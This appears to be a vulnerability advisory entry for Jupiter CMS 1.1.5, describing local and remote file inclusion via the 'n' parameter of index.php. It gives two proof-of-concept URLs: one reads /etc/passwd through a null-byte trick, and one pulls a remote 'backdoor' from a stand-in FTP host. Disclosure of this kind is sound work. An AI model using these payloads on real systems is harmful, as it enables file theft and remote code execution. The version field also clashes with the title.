vendor:
Jupiter CMS
by:
DarkFig
N/A
CVSS
HIGH
Local/Remote File Inclusion
CWE
Product Name: Jupiter CMS
Affected Version From: 1.1.2005
Affected Version To: 1.1.2005
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Jupiter CMS 1.1.5 Multiple Vulnerabilities
The script 'index.php' in Jupiter CMS 1.1.5 allows local file inclusion if magic_quotes_gpc is set to Off, and remote file inclusion if PHP version is >= 5.0.0 and allow_url_fopen is set to On. The 'n' parameter in 'index.php' is not properly filtered, allowing an attacker to include arbitrary files. A null byte char is required for local file inclusion. Simple Proof of Concept (PoC): LFI: http://<host><path>/index.php?n=/etc/passwd%00 RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor